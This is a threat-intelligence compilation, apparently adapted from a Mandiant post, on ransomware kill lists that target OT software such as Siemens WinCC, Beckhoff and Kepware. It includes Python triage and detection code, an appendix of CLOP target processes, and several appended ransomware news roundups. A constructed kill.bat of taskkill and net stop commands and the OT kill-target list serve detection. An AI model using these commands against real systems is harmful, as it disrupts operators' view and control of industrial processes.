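"""Triage a ransomware process kill list for OT-related entries.

Added example, not Mandiant's tooling. KILL_BAT and STRINGS_DUMP are
constructed inputs that mimic the two forms described in the post (a
batch script, and names hardcoded in a binary as recovered with a
strings dump); OT_PROCESSES is an illustrative, hypothetical mapping
from a handful of process names to the vendor suites the post names.
"""
import re

# Constructed input: a batch script in the style of the LockerGoga kill.bat,
# including the concatenation/typo artifacts the post describes.
KILL_BAT = r"""
@echo off
taskkill /IM sqlservr.exe /F
taskkill /IM proficyclient.exe /F
taskkill /F /IM ihistorian.exe
net stop "GE Proficy Historian" /y
taskkill /IM a2guard.exea2start.exe /F
taskkill /IM nexe /F
"""

# Constructed input: one process name per line, as a strings dump of a
# binary with a hardcoded list might yield.
STRINGS_DUMP = """
agntsvc.exe
ccprojectmgr.exe
tcatsyssrv.exe
server_runtime.exe
chrome.exe
"""

# Hypothetical vendor map (lower-case process name -> suite).
OT_PROCESSES = {
    "proficyclient.exe": "GE Proficy",
    "ihistorian.exe": "GE Proficy",
    "ccprojectmgr.exe": "Siemens SIMATIC WinCC",
    "tcatsyssrv.exe": "Beckhoff TwinCAT",
    "server_runtime.exe": "Kepware KEPServerEX",
}

TASKKILL_RE = re.compile(r"taskkill\s+(?:/f\s+)?/im\s+(\S+)", re.IGNORECASE)
NETSTOP_RE = re.compile(r'net\s+stop\s+"?(.+?)"?\s*(?:/y)?\s*$',
                        re.IGNORECASE | re.MULTILINE)


def parse_kill_bat(text):
    """Return (process names, service names) a kill.bat tries to stop."""
    procs = [m.group(1).lower() for m in TASKKILL_RE.finditer(text)]
    services = [m.group(1).strip().lower() for m in NETSTOP_RE.finditer(text)]
    return procs, services


def parse_strings_dump(text):
    """Return the non-empty lines of a strings dump, lower-cased."""
    return [line.strip().lower() for line in text.splitlines() if line.strip()]


def split_concatenated(name):
    """Split 'a2guard.exea2start.exe' into ['a2guard.exe', 'a2start.exe'].

    Returns [name] unchanged when the entry does not look like two names
    run together."""
    parts = re.findall(r".+?\.exe", name)
    if len(parts) > 1 and "".join(parts) == name:
        return parts
    return [name]


def triage(names):
    """Classify kill-list entries into OT hits, malformed entries and the rest."""
    report = {"ot": {}, "malformed": [], "other": []}
    for raw in names:
        parts = split_concatenated(raw)
        # Two names run together, or no .exe extension: a copy/typo artifact
        # worth recording, since it helps cluster list iterations.
        if len(parts) > 1 or not raw.endswith(".exe"):
            report["malformed"].append(raw)
        for name in parts:
            vendor = OT_PROCESSES.get(name)
            if vendor:
                report["ot"][name] = vendor
            else:
                report["other"].append(name)
    return report


if __name__ == "__main__":
    procs, services = parse_kill_bat(KILL_BAT)
    print("kill.bat:", triage(procs), "services:", services)
    print("strings:", triage(parse_strings_dump(STRINGS_DUMP)))
```

The malformed entries are kept rather than discarded because, as the post notes, the same typos recurring across families are the evidence that the lists share one source; the "other" bucket is where a reviewer would look for names that are not yet in the vendor map.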

Second List Deployed Alongside CLOP Ransomware Sample Has a Higher Chance of Impacting OT Systems

Mandiant analyzed a second, entirely unrelated ransomware sample (MD5: 3b980d2af222ec909b948b6bbdd46319) from the CLOP family with a hardcoded list for enumeration and termination of processes that includes a number of OT strings. The list contains over 1,425 processes, of which at least 150 belong to OT-related software suites (Figure 2 and Appendix).

Based on our analysis, the CLOP malware family's process kill list has grown over time, possibly as more processes were collected during different compromises. While we do not currently hold enough information to describe the exact mechanism the actor used to grow the list, it appears to have resulted from actor reconnaissance across multiple victims. We have observed the threat actor employing process discovery procedures, including running the tasklist utility (MITRE ATT&CK T1057, Process Discovery). This indicates that the actor scanned for processes in at least one victim's OT network before deploying the ransomware.
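The recon-then-kill sequence above (tasklist followed by a burst of taskkill or net stop) is visible in process-creation telemetry. The following is an added example, not Mandiant's detection content: it runs over a constructed feed of process-creation events (only the fields of Sysmon Event ID 1 or Security Event 4688 that matter here), raises one alert per host whose kill count inside an assumed ten-minute window reaches an assumed threshold, marks the alert high severity when tasklist.exe ran on that host shortly before, and lists any targets that match an illustrative subset of the OT process names from the appendix.

```python
"""Flag a tasklist reconnaissance step followed by a taskkill / net stop burst.

Added example, not tooling from the post. EVENTS is a constructed feed of
process-creation records reduced to the fields used here (the shape of
Sysmon Event ID 1 or Security Event 4688); OT_HINTS is an illustrative
subset of process names from the vendors the post names; WINDOW and
MIN_KILLS are assumed tuning values.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumed: recon-to-kill and burst window
MIN_KILLS = 5                    # assumed: kills within WINDOW that count as a burst

OT_HINTS = {"ccprojectmgr.exe", "hmirtm.exe", "s7oiehsx64.exe",
            "tcatsyssrv.exe", "server_runtime.exe", "opcualds.exe"}

# Constructed events: (timestamp, host, image path, command line)
EVENTS = [
    ("2020-06-01T02:14:05", "hmi-01", r"C:\Windows\System32\tasklist.exe", "tasklist /v"),
    ("2020-06-01T02:14:40", "hmi-01", r"C:\Windows\System32\taskkill.exe", "taskkill /IM ccprojectmgr.exe /F"),
    ("2020-06-01T02:14:41", "hmi-01", r"C:\Windows\System32\taskkill.exe", "taskkill /IM hmirtm.exe /F"),
    ("2020-06-01T02:14:41", "hmi-01", r"C:\Windows\System32\taskkill.exe", "taskkill /IM s7oiehsx64.exe /F"),
    ("2020-06-01T02:14:42", "hmi-01", r"C:\Windows\System32\taskkill.exe", "taskkill /IM sqlservr.exe /F"),
    ("2020-06-01T02:14:42", "hmi-01", r"C:\Windows\System32\taskkill.exe", "taskkill /IM outlook.exe /F"),
    ("2020-06-01T02:14:43", "hmi-01", r"C:\Windows\System32\net.exe", 'net stop "KEPServerEX 6" /y'),
    # an engineer checking one hung process: recon plus a single kill, no burst
    ("2020-06-01T09:03:10", "ews-02", r"C:\Windows\System32\tasklist.exe", "tasklist"),
    ("2020-06-01T09:03:30", "ews-02", r"C:\Windows\System32\taskkill.exe", "taskkill /IM excel.exe /F"),
    # a maintenance script stopping several IT services, no prior recon
    ("2020-06-01T22:00:00", "app-03", r"C:\Windows\System32\net.exe", "net stop spooler"),
    ("2020-06-01T22:00:01", "app-03", r"C:\Windows\System32\net.exe", "net stop wuauserv"),
    ("2020-06-01T22:00:01", "app-03", r"C:\Windows\System32\taskkill.exe", "taskkill /F /IM notepad.exe"),
    ("2020-06-01T22:00:02", "app-03", r"C:\Windows\System32\taskkill.exe", "taskkill /F /IM chrome.exe"),
    ("2020-06-01T22:00:02", "app-03", r"C:\Windows\System32\taskkill.exe", "taskkill /F /IM teams.exe"),
]

KILL_RE = re.compile(r"/im\s+(\S+)", re.IGNORECASE)
STOP_RE = re.compile(r'stop\s+"?([^"/]+?)"?\s*(?:/y)?\s*$', re.IGNORECASE)


def kill_target(image, cmdline):
    """Return the process or service name a command stops, else None."""
    exe = image.lower().rsplit("\\", 1)[-1]
    if exe == "taskkill.exe":
        m = KILL_RE.search(cmdline)
    elif exe == "net.exe":
        m = STOP_RE.search(cmdline)
    else:
        return None
    return m.group(1).strip().lower() if m else None


def detect(events, window=WINDOW, min_kills=MIN_KILLS):
    """Return one alert per host with at least `min_kills` kills inside `window`.

    Severity is 'high' when tasklist.exe ran on the host within `window`
    before the burst started, otherwise 'medium'."""
    by_host = defaultdict(list)
    for ts, host, image, cmdline in events:
        by_host[host].append((datetime.fromisoformat(ts), image, cmdline))

    alerts = []
    for host, evs in sorted(by_host.items()):
        evs.sort(key=lambda e: e[0])
        kills, recon = [], []
        for t, image, cmdline in evs:
            target = kill_target(image, cmdline)
            if target is not None:
                kills.append((t, target))
            elif image.lower().endswith("\\tasklist.exe"):
                recon.append(t)
        for i, (t0, _) in enumerate(kills):
            burst = [k for k in kills[i:] if k[0] <= t0 + window]
            if len(burst) < min_kills:
                continue
            seen_recon = any(t0 - window <= r <= t0 for r in recon)
            alerts.append({
                "host": host,
                "first_kill": t0.isoformat(),
                "kills": len(burst),
                "severity": "high" if seen_recon else "medium",
                "ot_targets": sorted({name for _, name in burst} & OT_HINTS),
            })
            break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

On the constructed feed the maintenance script on app-03 trips the medium tier, which is deliberate: a kill burst on its own is common enough in IT that the recon step and the presence of OT targets are what should drive the analyst's priority, and both thresholds need tuning against a site's own baseline.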


Figure 2: Subset of processes in observed CLOP sample

CLOP is also interesting as we have only observed a single unique and very prolific financially motivated threat actor leveraging the malware family. The group, who has been active since at least 2016 and potentially as early as 2014, is known for operating large phishing campaigns to distribute malware and typically monetizes intrusions through ransomware deployment. As highlighted by their versatility and long history in financially motivated intrusions, the actor’s activity in OT networks is likely no more than an additional step in the process for monetization. However, the financial motivations of the actor again do not imply low risk to OT. Instead, our analysis of the CLOP sample’s kill list indicates that the included processes actually have greater potential to disrupt OT systems than those included in the shared list described above.

Unlike the first kill list, the CLOP sample includes a list of processes that, if stopped, may directly impact the operator’s ability to both visualize and control production. This is especially true in the case of some included processes that support HMI and PLC supervision. Some of the OT processes present in the CLOP sample are related to the following products:

Vendor | Product | Description
Siemens | SIMATIC WinCC | SCADA system, common for process control and automation.
Beckhoff | TwinCAT | Software for PC-based process control and automation.
National Instruments | Data Acquisition Software (DAQ) | Software used to acquire data from sensors and signal conditioning devices.
Kepware | KEPServerEX | Software platform that collects information from industrial devices and sends the output to SCADA applications.
OPC Unified Architecture (OPC-UA) | N/A | Communication protocol for data acquisition and exchange between industrial equipment and enterprise systems.

Table 1: Examples of products related to OT processes included in identified CLOP kill list

While it is likely the physical processes this software controls would continue to operate even if the software processes were terminated unexpectedly, stopping the software processes included in the CLOP sample's kill list could result in the loss of view/control over those physical processes, because operators would no longer be able to interact with the equipment. This can be caused not only by the ransomware's disruption of intermediary systems, but also by the loss of access to files on HMIs and engineering workstations (EWS) that process control and monitoring software needs in order to run, for example configuration or project files. This could prolong the mean time to recovery (MTTR) of impacted environments that lack offline backups. In the CLOP sample list, we also identified specialized processes for software application design and testing whose files may also become corrupted at the time of encryption.

Process Kill Lists Are Just An Observable Indicating Broader Financially Motivated Interest In OT

Financially motivated threat actors leverage a large variety of tactics and techniques to obtain data that they can later use to generate profits. While financial actors have historically posed little to no threat to OT systems, the recent uptick in ransomware and extortion incidents highlights that industrial operations are increasingly at risk. Although we have not observed any financially motivated actors explicitly targeting OT systems, our research into process kill lists deployed with or alongside ransomware samples shows that at least two sophisticated financial actors have expanded their access into OT networks during their regular intrusions.

This increasing exposure of OT to financially motivated threat activity is no surprise, given that TTPs used by cybercriminals increasingly resemble those employed by sophisticated actors. We have consistently conveyed this message since at least 2018, when we publicly discussed the commodity and custom IT tools leveraged by the TRITON attacker while traversing through its targets’ networks (Figure 3). The likelihood of financially motivated actors impacting OT while seeking to monetize intrusions will continue to rise for the following reasons:


Figure 3: TTPs seen across both IT and OT incidents

  • Financially-motivated threat actors moving to a post-compromise ransomware model will continue to evolve and find ways to reach the most critical systems of organizations as part of their mission of monetization. As these actors are mainly driven by profits, they are not likely to differentiate between IT and OT assets.
  • OT organizations will continue to struggle to evolve at the same pace as cyber criminals. As a result, small weaknesses such as misconfigurations, exposed vulnerabilities or improper segmentation will be enough for financial actors to gain access to networks in their attempts to profit from intrusions.
  • As the market for OT solutions continues to incorporate IT services and features into broadly adopted products, we expect the convergence of technologies to result in a broader attack surface for financial threat actors to target.
  • The TTPs employed by both financial and sophisticated nation-state actors often rely on intermediary systems as stepping stones through intrusions. As a result, the skills of both groups hold similar potential of reaching OT systems even when financial groups may only do so coincidentally or as part of their monetization strategy.

Outlook

As OT networks continue to become more accessible to threat actors of all motivations, security threats that have historically impacted primarily IT are becoming more commonplace. This normalization of OT as just another network from the threat actor perspective is problematic for defenders for many of the reasons discussed above. This recent threat activity should be taken as a wake-up call for two main reasons: the various security challenges commonly faced by organizations to protect OT networks, and the significant consequences that may arise from security compromises even when they are not explicitly designed to target production systems. Asset owners need to look at OT security with the mindset that it is not if you will have a breach, but when. This shift in thinking will allow defenders to better prepare to respond when an incident does happen, and can help reduce the impact of an incident by orders of magnitude.   

Appendix: Selection Of OT Processes From CLOP Kill List

Process Name | Vendor
ACTLICENSESERVER.EXE | Atlas Copco
TCATSYSSRV.EXE | Beckhoff
TCEVENTLOGGER.EXE | Beckhoff
TCR.EXE | Beckhoff
ALARMMANAGER.EXE | GE
S2.EXE | Honeywell
BR.ADI.DISPLAY.BRIGHTNESS.EXE | B&R
BR.ADI.SERVICE.EXE | B&R
BR.ADI.UPS.MANAGER.EXE | B&R
BR.ADI.UPS.SERVICE.EXE | B&R
BR.AS.UPGRADESERVICE.EXE | B&R
BRAUTHORIZATIONSVC.EXE | B&R
BRTOUCHSVC.EXE | B&R
OPCROUTER4SERVICE.EXE | Inray Industriesoftware
OPCROUTERCONFIG.EXE | Inray Industriesoftware
SERVER_EVENTLOG.EXE | Kepware
SERVER_RUNTIME.EXE | Kepware
NICELABELAUTOMATIONSERVICE2017.EXE | NiceLabel
NICELABELPROXY.EXE | NiceLabel
NICELABELPROXYSERVICE2017.EXE | NiceLabel
APPLICATIONWEBSERVER.EXE | National Instruments
CWDSS.EXE | National Instruments
NIAUTH_DAEMON.EXE | National Instruments
NIDEVMON.EXE | National Instruments
NIDISCSVC.EXE | National Instruments
NIDMSRV.EXE | National Instruments
NIERSERVER.EXE | National Instruments
NILXIDISCOVERY.EXE | National Instruments
NIMDNSRESPONDER.EXE | National Instruments
NIMXS.EXE | National Instruments
NIPXICMS.EXE | National Instruments
NIROCO.EXE | National Instruments
NISDS.EXE | National Instruments
NISVCLOC.EXE | National Instruments
NIWEBSERVICECONTAINER.EXE | National Instruments
SYSTEMWEBSERVER.EXE | National Instruments
OPC.UA.DISCOVERYSERVER.EXE | OPC
OPCUALDS.EXE | OPC
ANAWIN.EXE | AUTEM
ASM.EXE | Possibly Siemens
PARAMETRIC.EXE | PTC
QDAS_O-QIS.EXE | Q-Das
QDAS_PROCELLA.EXE | Q-Das
QDAS_QS-STAT.EXE | Q-Das
QDASIDI_SRV.EXE | Q-Das
SPCPROCESSLINK.EXE | Q-Das
TAGSRV.EXE | Rockwell Automation or National Instruments
_SIMPCMON.EXE | Siemens
ALMPANELPLUGIN.EXE | Siemens
ALMSRV64X.EXE | Siemens
ALMSRVBUBBLE64X.EXE | Siemens
CC.TUNNELSERVICEHOST.EXE | Siemens
CCAEPROVIDER.EXE | Siemens
CCAGENT.EXE | Siemens
CCALGRTSERVER.EXE | Siemens
CCARCHIVEMANAGER.EXE | Siemens
CCCAPHSERVER.EXE | Siemens
CCCSIGRTSERVER.EXE | Siemens
CCDBUTILS.EXE | Siemens
CCDELTALOADER.EXE | Siemens
CCDMRUNTIMEPERSISTENCE.EXE | Siemens
CCECLIENT_X64.EXE | Siemens
CCECLIENT.EXE | Siemens
CCESERVER_X64.EXE | Siemens
CCESERVER.EXE | Siemens
CCKEYBOARDHOOK.EXE | Siemens
CCLICENSESERVICE.EXE | Siemens
CCNSINFO2PROVIDER.EXE | Siemens
CCPACKAGEMGR.EXE | Siemens
CCPERFMON.EXE | Siemens
CCPROFILESERVER.EXE | Siemens
CCPROJECTMGR.EXE | Siemens
CCPTMRTSERVER.EXE | Siemens
CCREDUNDANCYAGENT.EXE | Siemens
CCREMOTESERVICE.EXE | Siemens
CCRT2XML.EXE | Siemens
CCRTSLOADER_X64.EXE | Siemens
CCSSMRTSERVER.EXE | Siemens
CCSYSTEMDIAGNOSTICSHOST.EXE | Siemens
CCTEXTSERVER.EXE | Siemens
CCTLGSERVER.EXE | Siemens
CCTMTIMESYNC.EXE | Siemens
CCTMTIMESYNCSERVER.EXE | Siemens
CCUCSURROGATE.EXE | Siemens
CCWATCHOPC.EXE | Siemens
CCWRITEARCHIVESERVER.EXE | Siemens
DA2XML.EXE | Siemens
GSCRT.EXE | Siemens
HMIES.EXE | Siemens
HMIRTM.EXE | Siemens
HMISMARTSTART.EXE | Siemens
HMRT.EXE | Siemens
IPCSECCOM.EXE | Siemens
OPCUASERVERWINCC.EXE | Siemens
PASSDBRT.EXE | Siemens
PDLRT.EXE | Siemens
PMEXP.EXE | Siemens
PNIOMGR.EXE | Siemens
REDUNDANCYCONTROL.EXE | Siemens
REDUNDANCYSTATE.EXE | Siemens
S7ACMGRX.EXE | Siemens
S7AHHLPX.EXE | Siemens
S7ASYSVX.EXE | Siemens
S7EPASRV64X.EXE | Siemens
S7HSPSVX.EXE | Siemens
S7KAFAPX.EXE | Siemens
S7O.TUNNELSERVICEHOST.EXE | Siemens
S7OIEHSX64.EXE | Siemens
S7OPNDISCOVERYX64.EXE | Siemens
S7SYMAPX.EXE | Siemens
S7TGTOPX.EXE | Siemens
S7TRACESERVICE64X.EXE | Siemens
S7UBTOOX.EXE | Siemens
S7UBTSTX.EXE | Siemens
S7WNRMSX.EXE | Siemens
S7WNSMGX.EXE | Siemens
S7WNSMSX.EXE | Siemens
S7XUDIAX.EXE | Siemens
S7XUTAPX.EXE | Siemens
SCORECFG.EXE | Siemens
SCOREDP.EXE | Siemens
SCOREPNIO.EXE | Siemens
SCORES7.EXE | Siemens
SCORESR.EXE | Siemens
SCSDISTSERVICEX.EXE | Siemens
SCSFSX.EXE | Siemens
SCSMX.EXE | Siemens
SDIAGRT.EXE | Siemens
SIEMENS.INFORMATIONSERVER.DISCOVERSERVICEINSTALLER.EXE | Siemens
SIEMENS.INFORMATIONSERVER.ISREADY.PLUGINSERVICE.EXE | Siemens
SIEMENS.INFORMATIONSERVER.SCHEDULER.EXE | Siemens
SIM9SYNC.EXE | Siemens
SIMNETPNPMAN.EXE | Siemens
SMARTSERVER.EXE | Siemens
SSERVCFG.EXE | Siemens
TOUCHINPUTPC.EXE | Siemens
TRACECONCEPTX.EXE | Siemens
TRACESERVER.EXE | Siemens
UM.RIS.EXE | Siemens
UM.SSO.EXE | Siemens
WEBNAVIGATORRT.EXE | Siemens
WINCCEXPLORER.EXE | Siemens
CCDMRTCHANNELHOST.EXE | Siemens
ANSYS.ACT.BROWSER.EXE | Ansys
ANSYS.EXE | Ansys
ANSYS192.EXE | Ansys
ANSYSFWW.EXE | Ansys
ANSYSLI_CLIENT.EXE | Ansys
ANSYSLI_MONITOR.EXE | Ansys
ANSYSLI_SERVER.EXE | Ansys
ANSYSLMD.EXE | Ansys
ANSYSWBU.EXE | Ansys
CONFIGSERVERI64.EXE | Tani
ENGINELOGGERI64.EXE | Tani
PLCENGINEI64.EXE | Tani

Webcast: What About Ransomware?

This is a joint webcast between Black Hills Information Security and the Wild West Hackin’ Fest conference. We hate ransomware. Like a lot. This is because we feel this is the future of cyber attacks. If you look at the recent cases and the newish versions that involve extortion, there is nothing to like. Well, […]


Cyber News Rundown: Ragnar Locker


Ragnar Locker Attacks Portuguese Energy Producer

It was recently confirmed that Energias de Portugal (EDP), one of the largest energy producers in the world, has fallen victim to the Ragnar Locker ransomware variant. The original attack took place in April but was only discovered in May, after the intruders had been active on EDP's systems for nearly three weeks. After contacting affected customers, the company also revealed it was subject to a Bitcoin ransom demand of roughly $10 million to ensure the stolen data wasn't publicly released.

Xchanging MSP Falls Victim to Ransomware

An MSP known as Xchanging, which primarily serves the insurance industry, was hit with a ransomware attack over the weekend that forced it to take many of its systems offline. Though the attack was largely confined to Xchanging’s systems and only affected a small number of customers, it is still unclear how long the infection was active before discovery. In a statement, the company says it’s working to restore access to customer operating environments as quickly as possible.

Fitness Firm Exposes Customer Info

Nearly 1.3 million customer files and photos were compromised after the fitness firm V Shred was breached, potentially affecting up to 100,000 clients. The data was stored on an improperly configured Amazon S3 bucket that was discovered as a part of a larger mapping project that had already located several similar leaks. While V Shred confirmed much of the data was publicly available, it originally denied that the dataset itself contained full names, addresses, and other highly sensitive personal information that could be used maliciously.

Magecart Group Surpasses 570 Victim Sites

In the three years since Magecart Group 8’s initial foray onto the card-skimming scene, it has successfully compromised over 570 e-commerce sites around the world. More than 25 percent of the attacks targeted US domains and stemmed from 64 unique attack domains that were able to distribute injected JavaScript software with relative ease. Many were nearly identical to legitimate domains. It’s believed the group has netted over $7 million from selling stolen payment card information since April 2017.

Clubillion Casino App Leak Could Affect Millions

A database containing personally identifiable information on millions of users of the casino app Clubillion was compromised in late March. The breach was discovered and secured within five days, though heavy traffic to the site may have exposed hundreds of thousands more individuals in that time. These types of apps are common targets because they hold such large quantities of sensitive data, which can then be leveraged for further attacks.


Cyber Security Roundup for July 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, June 2020.

Australian Prime Minister Scott Morrison announced that a sophisticated nation-state actor is causing increasing havoc by attacking the country's government, corporate institutions and critical infrastructure operators. He said, "We know it is a sophisticated state-based cyber actor because of the scale and nature of the targeting and the tradecraft used". While Morrison didn't actually name the specific country responsible in his statement, Reuters said its sources confirmed China was the culprit. Political tensions have ramped up between Australia and China in recent months after Australia called for an investigation into China's handling of the COVID-19 pandemic. China then reacted by placing tariffs on Australian exports and banning shipments of beef from Australia.

Why am I leading a UK cybersecurity blog with an Australian cyberattacks story? Well, it is because the UK might well be next in the cross-hairs of China's sophisticated cyber army, after the UK Government's stance on using Huawei in 5G infrastructure significantly soured last month, and also due to the increasing political pressure applied by the UK government on the Chinese government following China's introduction of a controversial new security law in Hong Kong.

Increased UK Huawei Tensions in June 2020
While the Australian PM rightly suggested their nation-state threat actor was sophisticated, the cyberattacks described aren't so sophisticated. The attackers engaged in spear-phishing campaigns designed to trick email recipients into clicking a link leading to malicious files or a credential harvesting page, opening malicious attachments, or granting Office 365 OAuth tokens to the actors. This is the same MO as the cyberattacks orchestrated by the cybercriminal fraternity on a daily basis. The Australian government statement advises organisations to patch their internet-facing devices, including web and email servers, and to use multifactor authentication. All good advice; in fact, all essential good practice for every organisation to adopt no matter its threat actor landscape.

Away from the international cyber warfare scene, a coalition led by security companies is urging the UK government to revamp the dated Computer Misuse Act. The UK's 'anti-hacking' law is 30 years old, written well before the internet took root in our digital society, and so is not really suitable for prosecuting modern cybercriminals, who tend to be prosecuted under financial crime and fraud laws instead. The coalition calling for a change in the law includes NCC Group, F-Secure, techUK, McAfee and Trend Micro. They argue that section 1 of the Act, which prohibits unauthorised access to any programme or data held in any computer, has not kept pace with advances in technology. In their letter to the PM they said: "With the advent of modern threat intelligence research, defensive cyber activities often involve the scanning and interrogation of compromised victims and criminals systems to lessen the impact of attacks and prevent future incidents. In these cases, criminals are obviously very unlikely to explicitly authorise such access."

Since launching a 'Suspicious Email Reporting Service' in April 2020, the UK National Cyber Security Centre (NCSC) announced it has now received one million reports, receiving around 16,500 emails a day. NCSC Chief Executive Officer Ciaran Martin called the number of reports a “milestone” and “a testament to the vigilance of the British public". I think the email reporting service is another fantastic free service provided by NCSC (i.e. UK Gov) to UK citizens, so one thing the UK government is definitely getting right in the cybersecurity space at the moment.

Zoom announced it will extend 'optional' end-to-end encryption (E2EE) to free users. It is not certain when exactly Zoom's free E2EE will commence or whether it will be on by default, given the Zoom CEO said, "We plan to begin early beta of the E2EE feature in July 2020." Still, it is good to see Zoom, much criticised over its security, continuing to bolster it, including by appointing a seasoned Chief Information Security Officer from Salesforce.

Some men just want to watch the world burn...
With the recent uptick in ransomware, phishing, unsecured cloud buckets and massive data breaches dominating the media headlines over the past couple of years, you could be forgiven for forgetting about the threat posed by Distributed Denial-of-Service (DDoS) attacks. So then, a timely reminder that some threat actors have vast botnets at their disposal for orchestrating huge DDoS attacks: Amazon reported thwarting the biggest ever DDoS attack by bandwidth, and a European bank suffered the biggest ever packets-per-second (PPS) DDoS attack. The motives of these colossal DDoS attacks are unclear; I guess some men just want to watch the world burn.
Quote from Batman butler Alfred (Michael Caine), The Dark Knight

    Cyber Security Roundup for June 2020

    A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, May 2020.

    EasyJet's disclosure of a "highly sophisticated cyber-attack", which occurred in January 2020 and impacted 9 million of its customers, was the biggest cybersecurity story of May 2020 in the UK. No details about this 'cyber-attack' were disclosed, other than that 2,208 customers had their credit card details accessed.


    Using terms like "highly sophisticated" without providing any actual details of the cyberattack makes one think back to when TalkTalk CEO Dido Harding described a cyber-attack as a "significant and sustained cyber-attack" in 2015. In TalkTalk's case, that cyber attack turned out to be a bunch of teenage kids taking advantage of a then 10-year-old SQL injection vulnerability. City A.M. described Dido's responses as "naive", noting that when asked whether the affected customer data was encrypted or not, she replied: "The awful truth is that I don't know". Today Dido is responsible for the UK government's Track, Test and Trace application, which no doubt will ring privacy alarm bells with some.

    Back to the EasyJet breach: all we know is that the ICO and the NCSC are supporting the UK budget airline. EasyJet said: "We take issues of security extremely seriously and continue to invest to further enhance our security environment. There is no evidence that any personal information of any nature has been misused, however, on the recommendation of the ICO, we are communicating with the approximately nine million customers whose travel details were accessed to advise them of protective steps to minimise any risk of potential phishing. We are advising customers to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays."

    It will be interesting to see the DPA enforcement line the Information Commissioner's Office (ICO) adopts with EasyJet, especially considering the current COVID-19 impact on the UK aviation industry. Some security commentators have called the ICO a "Toothless Tiger" in regards to its supportive response, an ICO label I've not heard since long before the GDPR came into force. But the GDPR still has a sting in its tail beyond ICO enforcement action in the UK, in that individuals impacted by personal data breaches can bring a class-action lawsuit. So then, it can be no real surprise that law firm PGMBM has announced it has issued a class-action claim in the High Court of London, with a potential liability of an eye-watering £18 billion. If successful, each customer impacted by the breach could receive a payout of £2,000.

    The 2020 Verizon Data Breach Investigations Report (DBIR) was released, the most valuable annual report in the cybersecurity industry in my humble opinion. The 2020 DBIR used data compiled before the COVID-19 pandemic. The report analyses 32,002 security incidents and 3,950 confirmed breaches from 81 contributors across 81 countries.
    • 86% of data breaches were for financial gain, up from 71% in 2019
    • 43% involved web applications (cloud-based); these attacks have doubled, reflecting the growth in the use of cloud-based services
    • 67% of data breaches resulted from credential theft, human error or social attacks
    • Clearly identified cyber-breach pathways enable a "Defender Advantage" in the fight against cyber-crime
    • On-going patching is working: fewer than 1 in 20 breaches exploit vulnerabilities
    The vast majority of breaches continue to be caused by external actors:
    • 70% were caused by external actors, with organised crime accounting for 55% of these
    • Credential theft and social attacks such as phishing and business email compromise cause the majority of breaches (over 67%), specifically:
      • 37% of credential theft breaches used stolen or weak credentials
      • 25% involved phishing
      • Human error accounted for 22%
    The 2020 DBIR highlighted a two-fold increase in web application breaches, to 43%, and stolen credentials were used in over 80% of these cases. Ransomware saw a slight increase, found in 27% of malware incidents compared to 24% in the 2019 DBIR, with 18% of organisations reporting that they blocked at least one piece of ransomware last year.

    REvil (aka Sodinokibi) hackers are said to have stolen celebrity data from the law firm Grubman Shire Meiselas & Sacks. Some 756 gigabytes of personal data, emails and contract details were taken, relating to clients including Lady Gaga, Madonna, Elton John, Barbra Streisand, Bruce Springsteen and Mariah Carey, to name a few.

    Pitney Bowes was hit with ransomware for the second time in 7 months. Pitney Bowes said attackers breached company systems and accessed "a limited set of corporate file shares" that "contained information used by our business teams and functional groups to conduct business-related activities." News reports state the Maze ransomware group is behind the attack, threatening to post confidential data if Pitney Bowes does not pay up.

    Amazon's UK website was defaced with racist abuse, which appeared on multiple product listings. Amazon has not disclosed how long the racist language remained on the site, but it sparked outrage on Twitter. Amazon said: "We investigated, removed the images in question and took action against the bad actor".

    LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.


      Passwords are and have always been an Achilles Heel in CyberSecurity

      LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

      Quotes
      “I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

      "There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

      "The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

      "Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

      "As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

      "The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

      "Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts breakdown the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

      "When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

      Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

      Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

      Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

      The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

      Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

      Victimology
